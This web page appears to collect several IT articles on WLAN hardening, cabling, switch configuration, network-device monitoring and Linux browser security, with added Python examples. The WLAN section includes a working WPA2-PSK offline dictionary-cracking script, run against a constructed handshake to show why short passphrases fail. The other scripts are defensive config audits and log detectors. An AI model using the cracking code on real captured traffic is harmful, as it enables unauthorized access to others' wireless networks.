
Hackers Share Tips on How to Better Secure Corporate WLANs | IT Infrastructure Advice, Discussion, Community


Once upon a time, Wi-Fi security was considered notoriously weak. Wireless encryption and authentication mechanisms such as WEP, Cisco LEAP, and the original WPA (TKIP) were shown to be little more than minor speed bumps for attackers who wanted to break in. Ever since WPA2 with AES-CCMP encryption arrived, however, opinions on Wi-Fi security have changed.

Most now consider WPA2-protected Wi-Fi to be as secure as (if not more secure than) a wired connection. But encryption is only one part of the overall Wi-Fi security battle, a fact I was reminded of repeatedly while attending DEF CON 27 earlier this month. When I asked attendees and wireless security pros working the conference for tips on how corporate WLANs can be better secured, most never even mentioned an encryption type, presumably because they assumed WPA2 would be in use. Instead, their answers focused on other security factors that WLAN administrators commonly overlook or ignore, factors that make wireless networks less secure than they should be. Here is what top wireless hackers say are the most overlooked ways you can better secure your corporate WLAN.

If you’re going to use pre-shared keys, make them complex and change them regularly

WPA2 comes in two forms. WPA2 Enterprise uses IEEE 802.1X and EAP to authenticate each user individually, typically with a username and password that only that user knows, or with a certificate. WPA2 Personal authenticates users or devices with a single pre-shared key (PSK) that every device on the SSID shares. Personal is nowhere near as strong as Enterprise from an authentication perspective (there is no way to tell one device from another, and no way to revoke one device's access without changing the key for all of them), but it is sometimes a necessary evil, especially when you must connect inexpensive IoT devices that cannot do 802.1X.

That said, if it is properly managed, WPA2 Personal can still be reasonably secure. The biggest risk is that IT departments neglect to change the PSK on a regular basis; it is not uncommon for the same PSK to stay in place for months or years. Over time the key inevitably leaks: it gets written on whiteboards, pasted into tickets, and carried off by departing staff and contractors. Anyone who holds it can join the network without you ever knowing, and, because every client derives its session keys from the same PSK, anyone who holds it and captures a client's 4-way handshake can also decrypt that client's traffic. Rotate the PSK on a schedule, and whenever someone who knew it leaves.

The other PSK tip is to make the passphrase as long and random as possible. It is important to understand what is actually being attacked here: not AES itself, but the passphrase. An attacker who captures a single WPA2 4-way handshake (or forces one by deauthenticating a client) can take it offline and test candidate passphrases against it at leisure. Each guess costs one PBKDF2 derivation (4,096 rounds of HMAC-SHA1 with the SSID as the salt), which is cheap on a GPU, so whether the attack succeeds in minutes or never depends entirely on the passphrase: a short or dictionary-based PSK falls to a wordlist, a long random one does not. Avoid a default or very common SSID as well, since the SSID is the salt and precomputed tables for common SSIDs already exist.
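To make that concrete, here is an added example (written for this page, not code from the article or from the DEF CON speakers) that reproduces the offline attack in Python against a constructed handshake. The SSID, MAC addresses, nonces and EAPOL frame are hypothetical values chosen for illustration, and the passphrase being recovered is known only because the example generates the "capture" itself. The PMK, PTK and MIC derivation follows IEEE 802.11i, so the per-guess cost it shows is the real one.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), as IEEE 802.11i specifies."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, keep 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the two MAC addresses and two nonces, all of which cross the air in the clear."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = first 16 bytes of HMAC-SHA1(KCK, frame with MIC zeroed)."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# Constructed stand-in for a sniffed handshake (hypothetical values, not real traffic).
SSID = "corp-iot"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_M2 = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 8 + SNONCE + b"\x00" * 34  # MIC field already zeroed


def make_capture(passphrase: str) -> dict:
    """Build what an attacker holds after sniffing: everything below except the passphrase."""
    kck = wpa2_ptk(wpa2_pmk(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return {"ssid": SSID, "ap": AP_MAC, "client": CLIENT_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": EAPOL_M2, "mic": eapol_mic(kck, EAPOL_M2)}


def crack_psk(capture: dict, wordlist) -> tuple:
    """Offline dictionary attack: one PBKDF2 (4,096 HMAC-SHA1 rounds) per candidate, no contact with the AP."""
    tried = 0
    for candidate in wordlist:
        tried += 1
        pmk = wpa2_pmk(candidate, capture["ssid"])
        kck = wpa2_ptk(pmk, capture["ap"], capture["client"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate, tried
    return None, tried


def years_to_exhaust(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every passphrase of this shape; the rate is whatever the attacker's hardware gives."""
    return charset_size ** length / guesses_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    cap = make_capture("Summer2019!")
    print(crack_psk(cap, ["password", "welcome1", "Summer2019!", "letmein"]))  # ('Summer2019!', 3)
    print(f"8 lowercase letters at 1e6 guesses/s: {years_to_exhaust(26, 8, 1e6) * 365:.1f} days")
    print(f"16 mixed-case alphanumerics at 1e6 guesses/s: {years_to_exhaust(62, 16, 1e6):.2e} years")
```

Each candidate costs one `pbkdf2_hmac` call with 4,096 iterations, and that is the whole story: the attacker never has to talk to your access point again after capturing the handshake, so a short dictionary word falls in seconds while a long random passphrase holds for longer than the hardware will exist.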

Penetration testing of guest Wi-Fi access

You may think you have configured access controls that only allow guest Wi-Fi users to reach the internet and perhaps a handful of internal resources. Yet mistakes are common, and they can expose far more of the internal corporate network than anyone intended. Even a rudimentary penetration test from the guest SSID, trying to reach the AP and controller management addresses, internal RFC 1918 subnets, the DNS and DHCP servers, and other guest clients on the same SSID, will show whether your access control lists (ACLs) and client isolation are actually doing what you think. Repeat it whenever the guest ACLs or VLAN layout change.

Take advantage of built-in Wi-Fi security tools

Most enterprise-grade WLAN hardware and software these days comes with a slew of security tools (often sold as wireless intrusion detection or prevention, WIDS/WIPS) that scan the wireless environment, baseline it, and flag anomalies: rogue access points, suspicious clients, and other malicious behaviour intended to probe or overwhelm your WLAN. These tools are widely available but are commonly not used regularly, or as intended. Learning to take advantage of security tools you have already paid for can help prevent wireless security breaches and outages, both small and large.

Device authentication using certificates

As mentioned, most enterprise-grade Wi-Fi uses WPA2 Enterprise for end-user authentication. While considered very secure, a second form of authentication is sometimes necessary: one that identifies and validates a specific end device, as opposed to a user. One way to accomplish this is a certificate-based EAP method such as EAP-TLS. Without getting overly technical, EAP-TLS works by installing certificates on client devices and on the authentication (RADIUS) server; each side uses its certificate to prove its identity to the other, and no password is ever sent. That lets administrators restrict a sensitive SSID to devices that carry a client certificate issued by the organization's own CA, which keeps rogue or personal devices off it, a common problem for companies with overly loose BYOD policies. Two caveats: the protection depends on the private key staying on the device (a TPM or OS keystore helps), and, whichever EAP method you use, clients must be configured to validate the server's certificate, since a client that accepts any RADIUS certificate will happily hand password-based credentials to an attacker's evil-twin access point.

Wi-Fi security is only as good as the person that implements it

Generally speaking, the technical aspects of Wi-Fi security are in good shape. For example, we have been discussing WPA2 without mentioning that its successor, WPA3, already exists and is (almost) ready to go. That said, according to the hackers at DEF CON, the biggest threat to corporate WLAN security is not a technical one; the biggest risks lie with the people responsible for configuring and managing the WLAN. It may therefore be well worth the time and effort to review your configuration, monitoring, auditing, and other processes to ensure your corporate WLAN is as secure as you want it to be.




Cabling Trials and Tribulations: Tips on Avoiding Problems


I've been involved in quite a few engagements that require new cabling. When I'm allowed, and it is a small job, I do it myself since it's quicker. Lately, I've had to rely on cabling companies and been reminded of how things can go horribly wrong. In this article, I will outline what I've run into in the hope that you will be prepared for your next cabling run. About 90 percent of the time the cabling companies do a great job, but every so often things go wrong.

Preparation is everything

I make sure I have drawings, specific instructions, photos, labels, and anything else that will make the cabling run as straightforward as possible. In most cases, I meet with the installers to walk them through what I need and ask for an ETA. I explain that I want all cabling, patch panels, and everything else labeled, and accompanying documentation provided. I also ask that we meet again after the work is completed, to ensure all is well and that the documentation has been delivered, before I sign off on the work.

So here’s some of the odd ball stuff I’ve run into:

Electrical tape as a labelling technique: I’ve had three companies use electrical tape to identify new cable runs. Not sure what happened to good old cable labels. I went back and put proper labels on everything after they left and then documented accordingly.

Short runs: And I’m not talking about little to no slack. I’ve had two companies run cable that was 3 to 4 feet too short. When I showed one of the cabling companies that it was too short, they gave me some Ethernet female to female couplers and suggested I use a longer patch cable to make up the difference.

Connectors: I had an installation company literally pull and leave the cabling unterminated. When I asked when they would have the cabling terminated, the reply, “That’s extra.”

Outdoor cabling: One company used indoor cabling outside. When I explained that there’s outdoor grade cabling and asked why they used indoor cabling outside, they said, “Outdoor cabling is not required since the cabling is up against the building and protected.” Yikes!

Grounding: If your installer does not know the concepts of grounding and when it’s required, call someone else.

CAT5 vs. CAT6 vs. CAT7: I had a few companies install CAT5 and CAT6 when CAT7 was specifically ordered. One admitted that they used CAT5 since they had a lot of it in stock.

The moral of the story is that you, or someone you designate, should go back to check on the installation. In this video, I show you one of the short runs I ran into. In this case, I was able to cut the tie wraps, reroute the cabling, and mount the equipment at the top of the rack to make it work.





Best Practices, Tips, and Tricks for Switch Configuration


I’m working on a new network design for a remote location and thought I would share some of my best practices, tips and tricks.

In this article I will assume the general design has been sorted out and will go to the configuration phase.

In some large companies, this step can be very simple. You get an IP address and password configured.  After the switch is installed and powered on, the network staff can remote in and ‘push’ the final configuration to the switch. In this case, I do not have that option.

My checklist of items to configure will be based on the client design documentation. Here’s a quick list of items to cover: DHCP, routing, VLANs, Spanning Tree, passwords, backups/upgrades, access lists, interface descriptions, time servers, authentication details, telnet/SSH, web interface, sys logging, and SNMP. Let’s look at these items in more detail.

DHCP

(Cisco configuration example)

If the switch supports it, I enable DHCP for the installation, since the network connection to the production DHCP server may not be available yet. In some cases I create a vendor VLAN with its own DHCP scope that only allows access to specific networks or devices. That way the vendor isn't always asking for a static IP when on site, or guessing one and causing a duplicate IP address. I'm sure we've all seen people swap the default gateway and host IP addresses.

Routing

If the switch has routing capabilities, it is important to configure the proper default gateway, or whichever routing protocols need to be supported. Pay attention to scenarios where you may have two or more default routes, since every vendor treats this differently: some round-robin by destination IP address, some treat the second route as a failover, and some load balance based on all sorts of options. In this case, the client specified a static route to a single destination, easy.

VLANS

(Cisco configuration example)

Typically you will have two VLANs: admin and clients. Or in some cases three VLANs: admin, clients, and VoIP. It is very important to figure out as much of this in advance as you can for your IP subnetting design. In most cases, contiguous IP subnets are preferred. Don't forget to put descriptions on your VLAN interfaces, if your device supports it. Deciding on your VLAN tagging (trunk) configuration also falls into this category, including which VLAN carries untagged traffic on each trunk.

Spanning tree

Spanning tree, rapid spanning tree, or whichever of the many other names covers this same family of protocols, is always significant. This also includes specific items such as BPDU Guard on edge ports and manually configuring bridge priority values so the root bridge ends up where you expect it. In some specific cases I have disabled spanning tree, but refer to your design document.

Passwords

Figure out your password policy, how often passwords will change, and whether you must integrate any authentication servers such as RADIUS or TACACS+. Check your equipment manual to see if your device supports features like lockout after repeated incorrect logins, accounting, and alerts.

Backups/updates

I always keep the base configuration on the device and a USB key while installing in case I need to revert back to the original configuration. You need to consider how often you will back up device configurations. There are many options, from manually backing up configurations, to scripts and finally applications that will back up whenever changes are made.  I have written quite a few scripts for clients that did not have a solution in place to perform a weekly backup. Don’t forget about backing up your firmware, IOS, and equipment software.  It is quite common to discover the device needs updates even though you just received it.

Access lists or filters

This covers device and protocol access. Device access is how you connect to the device through physical ports such as Ethernet, serial console, USB, and others. I am not a fan of leaving physical ports without passwords unless the client specifically requests it. If your device has various 'levels of access', avoid using the same password for each. If you are going to create multiple user accounts, try to do it by job function or department, such as WAN, Wi-Fi, Voice, and others.

Then there are other forms of access, such as HTTP/HTTPS, Telnet/SSH, APIs, and vendor-specific applications or protocols. Protocol access means restricting each protocol to specific IP addresses or subnets. Depending on your product, this might cover telnet, SNMP, RMON, NetFlow, HTTP/HTTPS, and others. During the installation I believe it is critical to monitor new equipment and ensure all is well, so in some cases we might enable SNMP for a while until the equipment is added to the corporate monitoring system. If you do, use SNMPv3, or at least a non-default read-only community restricted by an ACL, and remove it once the permanent monitoring is in place.

Interface descriptions

(Cisco configuration example)

I can't stress enough how important descriptions are, on ALL devices when possible. Devices such as switches, routers, and firewalls may be in secured locations or offsite, so knowing what is connected to each port speeds up troubleshooting. Do not rely solely on vendor discovery protocols, since they may not be compatible with all equipment and you never know which devices will send them. In specific scenarios I actually disable discovery protocols on untrusted or public ports and networks, since they send a lot of useful information (platform, software version, addresses) out every port in clear text.

Sys logging, time servers and SNMP

This also covers other monitoring protocols Netflow, RMON, and more. The point here is to decide what the addresses and credentials are of these devices in your environment and ensure the relevant protocols work before walking away.

All these points should be confirmed and reviewed during support and configuration changes.
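As an added example (not part of the original article), the following Python script audits a constructed IOS-style running-config against several of the checklist items above: plain-text passwords, default or read-write SNMP communities, missing NTP and syslog targets, telnet on the vty lines, a missing access-class, and interfaces without descriptions. The config text and device names are hypothetical and the check names are my own; the parser only understands the header-plus-indented-children layout of IOS-style configs.

```python
import re

# Constructed sample running-config in IOS style (hypothetical device, not from the article);
# several checklist items are deliberately left weak so the audit has something to find.
SAMPLE_CONFIG = """\
hostname remote-sw1
no service password-encryption
enable password letmein
ip domain-name example.invalid
!
interface GigabitEthernet1/0/1
 description Uplink to core
!
interface GigabitEthernet1/0/2
!
snmp-server community public RO
snmp-server community private RW
logging host 10.0.0.50
!
line vty 0 4
 transport input telnet ssh
 login local
!
"""


def sections(config: str):
    """Split an IOS-style config into (header, [indented child lines]) blocks, dropping '!' separators."""
    blocks, header, children = [], None, []
    for raw in config.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw.startswith(" "):
            children.append(raw.strip())
            continue
        if header is not None:
            blocks.append((header, children))
        header, children = raw.strip(), []
    if header is not None:
        blocks.append((header, children))
    return blocks


def audit_config(config: str):
    """Return (check_id, detail) findings for the checklist items that can be read off the config text."""
    blocks = sections(config)
    top = [h for h, _ in blocks]
    findings = []
    if "no service password-encryption" in top:
        findings.append(("password-encryption", "line passwords are stored in clear text"))
    if any(h.startswith("enable password ") for h in top):
        findings.append(("enable-password", "'enable password' in use; use 'enable secret' (hashed) instead"))
    for h in top:
        m = re.match(r"snmp-server community (\S+)(?:\s+(RO|RW))?", h)
        if not m:
            continue
        community, mode = m.group(1), m.group(2) or "RO"
        if community.lower() in {"public", "private"}:
            findings.append(("snmp-default-community", f"default community string '{community}' is configured"))
        if mode == "RW":
            findings.append(("snmp-rw", f"read-write community '{community}'; prefer SNMPv3 or RO plus an ACL"))
    if not any(h.startswith("ntp server") for h in top):
        findings.append(("ntp", "no NTP server; log timestamps will not line up across devices"))
    if not any(h.startswith("logging host") for h in top):
        findings.append(("syslog", "no syslog host configured"))
    for header, children in blocks:
        if header.startswith("line vty"):
            transports = [c for c in children if c.startswith("transport input")]
            if not transports or any("telnet" in t or t.endswith(" all") for t in transports):
                findings.append(("vty-telnet", f"{header}: telnet not excluded; set 'transport input ssh'"))
            if not any(c.startswith("access-class") for c in children):
                findings.append(("vty-acl", f"{header}: no access-class limiting management sources"))
        elif header.startswith("interface ") and not any(c.startswith("description") for c in children):
            findings.append(("no-description", f"{header}: missing description"))
    return findings


if __name__ == "__main__":
    for check, detail in audit_config(SAMPLE_CONFIG):
        print(f"{check:24} {detail}")
```

Run it against a saved copy of the config before you leave site and again after every change; a script like this is also a convenient place to encode whatever the client's design document demands, so the review in the last paragraph becomes a diff of findings rather than a reread of the whole config.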




Four Tips to Worsen Your Network Security


If you want to keep your network infrastructure secure, you need to monitor what is going on with routers, switches, firewalls and other network devices. That visibility lets you quickly detect and investigate threats to your perimeter, such as unauthorized configuration changes, suspicious logon attempts, and scanning activity. An improper configuration change, for example, can leave the network wide open to attackers. If you want to strengthen your network security, never follow these four tips.

Tip # 1: Don’t care about unauthorized logons

Most attempts to log on to a network device are legitimate actions by network administrators, but some are not, and failing to detect suspicious logon attempts promptly leaves your organization exposed. Events worth alerting on include an admin logging in outside business hours or during holidays, bursts of failed logon attempts, and modifications to access rights. An immediate alert on such events lets IT staff act before security is compromised. The same records help with compliance audits, since they provide evidence that privileged users and their activity on your devices are closely watched (who is logging in, from where, and how often).

Tip # 2: Configure your devices at random

The key threat associated with network devices is improper configuration. A single incorrect change can weaken your perimeter security, raise concerns during regulatory audits and even cause costly system outages that can bring your business down. For example, a firewall misconfiguration can give attackers easy access to your network, which could lead to lasting damage. Visibility into who changed what will provide you with insight and control of your network devices. Continuous auditing would enable you to have better user accountability and detect potential security incidents more quickly before they cause real trouble.

Tip # 3: Ignore scanning threats

Attackers routinely scan a network to learn its structure and behaviour before executing an attack on it. If you don't monitor your network devices for scanning activity, you may miss malicious activity until your sensitive data is already compromised. To strengthen your protection against scanning and minimize the risk of a breach, monitor your network devices continuously. Such visibility lets you see which hosts and subnets were scanned, which IP address the scan came from, and how many connection attempts were made.

Tip # 4: Ease control of VPN logons

Virtual private network (VPN) access is a popular way to secure remote connections, but it carries risks of its own. In practice, VPN access is often granted to anyone in the organization without any approval process. Best practice is to grant VPN access to network resources only after proper approval, and only to users who need it for their job. Even then, no VPN is 100 percent secure and every VPN connection is a risk. The major risk scenarios include a user connecting from public Wi-Fi (where someone might steal their credentials) or a user who doesn't normally use the VPN suddenly beginning to (which can be a sign that the user has lost a device and someone else is trying to log in with it). Visibility into network devices lets you keep track of every VPN logon attempt: who tried to access your network, the IP address each authentication attempt came from, and the reason for each failed VPN logon.
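Here is an added example (not from the original article) that turns Tips 1, 3 and 4 into detection logic in Python, run over a constructed log of hypothetical devices and addresses: a burst of failed logons from one source, a successful admin logon at 2 a.m., a source hitting ten ports on one host inside two minutes, and a VPN logon by a user with no VPN history. The pipe-delimited log format is invented for the example; on a real network you would feed these functions from your syslog collector's parsed fields.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (hypothetical devices and addresses, not from the article).
# One event per line: timestamp|device|event|user|source[|destination:port]
SAMPLE_LOG = """\
2019-08-12T02:14:07|core-sw1|LOGIN_FAILED|admin|203.0.113.9
2019-08-12T02:14:09|core-sw1|LOGIN_FAILED|admin|203.0.113.9
2019-08-12T02:14:12|core-sw1|LOGIN_FAILED|admin|203.0.113.9
2019-08-12T02:14:15|core-sw1|LOGIN_FAILED|admin|203.0.113.9
2019-08-12T02:14:18|core-sw1|LOGIN_FAILED|admin|203.0.113.9
2019-08-12T02:15:01|core-sw1|LOGIN_OK|admin|203.0.113.9
2019-08-12T09:30:00|core-sw1|LOGIN_OK|netops|10.0.0.12
2019-08-12T10:02:11|fw1|CONN_DENY|-|198.51.100.7|10.0.0.5:21
2019-08-12T10:02:12|fw1|CONN_DENY|-|198.51.100.7|10.0.0.5:22
2019-08-12T10:02:13|fw1|CONN_DENY|-|198.51.100.7|10.0.0.5:23
2019-08-12T10:02:14|fw1|CONN_DENY|-|198.51.100.7|10.0.0.5:25
2019-08-12T10:02:15|fw1|CONN_DENY|-|198.51.100.7|10.0.0.5:53
2019-08-12T10:02:16|fw1|CONN_DENY|-|198.51.100.7|10.0.0.5:80
2019-08-12T10:02:17|fw1|CONN_DENY|-|198.51.100.7|10.0.0.5:135
2019-08-12T10:02:18|fw1|CONN_DENY|-|198.51.100.7|10.0.0.5:443
2019-08-12T10:02:19|fw1|CONN_DENY|-|198.51.100.7|10.0.0.5:445
2019-08-12T10:02:20|fw1|CONN_DENY|-|198.51.100.7|10.0.0.5:3389
2019-08-12T11:00:00|fw1|CONN_DENY|-|10.0.0.12|10.0.0.5:23
2019-08-12T10:20:00|vpn1|VPN_LOGIN_OK|jdoe|203.0.113.40
2019-08-12T10:25:00|vpn1|VPN_LOGIN_FAILED|mallory|203.0.113.41
2019-08-12T10:25:30|vpn1|VPN_LOGIN_OK|mallory|203.0.113.41
"""


def parse_log(text: str) -> list:
    """Turn the pipe-delimited lines into event dicts with a real datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("|")
        ts, device, event, user, src = parts[:5]
        events.append({"ts": datetime.fromisoformat(ts), "device": device, "event": event,
                       "user": user, "src": src, "dst": parts[5] if len(parts) > 5 else None})
    return events


def failed_logon_bursts(events, threshold=5, window=timedelta(minutes=5)):
    """Tip 1: (source, user, count) where at least `threshold` failed logons fall inside one sliding window."""
    times = defaultdict(list)
    for e in events:
        if e["event"].endswith("LOGIN_FAILED"):
            times[(e["src"], e["user"])].append(e["ts"])
    hits = []
    for (src, user), ts in times.items():
        ts.sort()
        start = 0
        for end in range(len(ts)):
            while ts[end] - ts[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                hits.append((src, user, end - start + 1))
                break
    return hits


def off_hours_logons(events, business_hours=(8, 18)):
    """Tip 1: successful device logons outside business hours (timestamps assumed to be local time)."""
    lo, hi = business_hours
    return [(e["ts"].isoformat(), e["device"], e["user"], e["src"])
            for e in events if e["event"] == "LOGIN_OK" and not lo <= e["ts"].hour < hi]


def port_scans(events, min_ports=10, window=timedelta(minutes=2)):
    """Tip 3: (source, host, distinct ports) where one source probes >= min_ports ports on a host within a window."""
    attempts = defaultdict(list)
    for e in events:
        if e["event"] == "CONN_DENY" and e["dst"]:
            host, port = e["dst"].rsplit(":", 1)
            attempts[(e["src"], host)].append((e["ts"], int(port)))
    hits = []
    for (src, host), seen in attempts.items():
        seen.sort()
        for i, (t0, _) in enumerate(seen):
            ports = {p for t, p in seen[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                hits.append((src, host, len(ports)))
                break
    return hits


def new_vpn_users(events, known_users) -> list:
    """Tip 4: successful VPN logons by users with no VPN history (a lost device in someone else's hands?)."""
    return sorted({e["user"] for e in events
                   if e["event"] == "VPN_LOGIN_OK" and e["user"] not in known_users})


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("failed-logon bursts:", failed_logon_bursts(evs))
    print("off-hours logons:   ", off_hours_logons(evs))
    print("port scans:         ", port_scans(evs))
    print("first-time VPN users:", new_vpn_users(evs, {"jdoe"}))
```

Note that the single denied connection from 10.0.0.12 and the lone VPN failure by mallory produce nothing: thresholds and windows are what keep rules like these from paging you on every typo, and they are the first thing to tune against a week of your own logs.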




5 Easy Tips for Linux Web Browser Security | Linux.com


If you use your Linux desktop and never open a web browser, you are a special kind of user. For most of us, however, a web browser has become one of the most-used digital tools on the planet. We work, we play, we get news, we interact, we bank… the number of things we do via a web browser far exceeds what we do in local applications. Because of that, we need to be cognizant of how we work with web browsers, and do so with a nod to security. Why? Because there will always be nefarious sites and people, attempting to steal information. Considering the sensitive nature of the information we send through our web browsers, it should be obvious why security is of utmost importance.

So, what is a user to do? In this article, I’ll offer a few basic tips, for users of all sorts, to help decrease the chances that your data will end up in the hands of the wrong people. I will be demonstrating on the Firefox web browser, but many of these tips cross the application threshold and can be applied to any flavor of web browser.

1. Choose Your Browser Wisely

Although most of these tips apply to most browsers, it is imperative that you select your web browser wisely. One of the more important aspects of browser security is the frequency of updates. New issues are discovered quite frequently and you need to have a web browser that is as up to date as possible. Of major browsers, here is how they rank with updates released in 2017:

  1. Chrome released 8 updates (with Chromium following up with numerous security patches throughout the year).

  2. Firefox released 7 updates.

  3. Edge released 2 updates.

  4. Safari released 1 update (although Apple does release 5-6 security patches yearly).

But even if your browser of choice releases an update every month, if you (as a user) don’t upgrade, that update does you no good. This can be problematic with certain Linux distributions. Although many of the more popular flavors of Linux do a good job of keeping web browsers up to date, others do not. So, it’s crucial that you manually keep on top of browser updates. This might mean your distribution of choice doesn’t include the latest version of your web browser of choice in its standard repository. If that’s the case, you can always manually download the latest version of the browser from the developer’s download page and install from there.

If you like to live on the edge, you can always use a beta or daily build of your browser. Note that a daily build or beta does carry the possibility of unstable software. Say, however, that you are okay with using a daily build of Firefox on an Ubuntu-based distribution. To do that, add the necessary repository with the command:

sudo apt-add-repository ppa:ubuntu-mozilla-daily/ppa

Update apt and install the daily Firefox with the commands:

sudo apt-get update

sudo apt-get install firefox

What’s most important here is to never allow your browser to get far out of date. You want to have the most updated version possible on your desktop. Period. If you fail this one thing, you could be using a browser that is vulnerable to numerous issues.

2. Use A Private Window

Now that your browser is updated, how do you make the best use of it? If you are the really concerned type, consider always using a private window. Private windows discard what they collected once you close them: no passwords, cookies, cache or history survive the session. Bear in mind what they do not do: while the window is open, sites still set cookies and see your real IP address, and your network operator still sees where you go. The caveat to browsing through a private window is that, as you would expect, every time you return to a site or service you will have to retype your credentials. If you are serious about browser security, never saving credentials in the browser should be your default behaviour.

This leads me to a reminder that everyone needs: Make your passwords strong! In fact, at this point in the game, everyone should be using a password manager to store very strong passwords. My password manager of choice is Universal Password Manager.

3. Protect Your Passwords

For some, having to retype those passwords every single time might be too much. So what do you do if you want to protect those passwords, while not having to type them constantly? If you use Firefox, there’s a built-in tool, called Master Password. With this enabled, none of your browser’s saved passwords are accessible, until you correctly type the master password. To set this up, do the following:

  1. Open Firefox.

  2. Click the menu button.

  3. Click Preferences.

  4. In the Preferences window, click Privacy & Security.

  5. In the resulting window, click the checkbox for Use a master password (Figure 1).

  6. When prompted, type and verify your new master password (Figure 2).

  7. Close and reopen Firefox.

4. Know your Extensions

There are plenty of privacy-focused extensions available for most browsers. What extensions you use will depend upon what you want to focus on. For myself, I choose the following extensions for Firefox:

  • Firefox Multi-Account Containers – Allows you to configure certain sites to open in a containerized tab.

  • Facebook Container – Always opens Facebook in a containerized tab (Firefox Multi-Account Containers is required for this).

  • Avast Online Security – Identifies and blocks known phishing sites and displays a website’s security rating (curated by the Avast community of over 400 million users).

  • Mining Blocker – Blocks all CPU-Crypto Miners before they are loaded.

  • PassFF – Integrates with pass (A UNIX password manager) to store credentials safely.

  • Privacy Badger – Automatically learns to block trackers.

  • uBlock Origin – Blocks trackers based on known lists.

Of course, you’ll find plenty more security-focused extensions for:

Not every web browser offers extensions. Some, such as Midori, offer a limited set of built-in plugins that can be enabled or disabled (Figure 3), but you won't find third-party extensions for the majority of these lightweight browsers.

5. Virtualize

For those concerned about exposing locally stored data to prying eyes, one option is to run the browser only inside a virtual machine. Install something like VirtualBox, install a Linux guest, and run whatever browser you like in the virtual environment; if the browser is compromised, the attacker lands in a disposable guest rather than on your desktop, as long as you don't share host folders or the clipboard with it. Combined with the tips above, this makes your browsing considerably safer.

The Truth of the Matter

The truth is, if the machine you are working from is on a network, you are never going to be 100% safe. But if you use your web browser intelligently you will get more bang for your security buck and be less prone to having data stolen. The silver lining with Linux is that the chance of getting malicious software installed on your machine is far lower than on some other platforms. Just remember to always use the latest release of your browser, keep your operating system updated, and use caution with the sites you visit.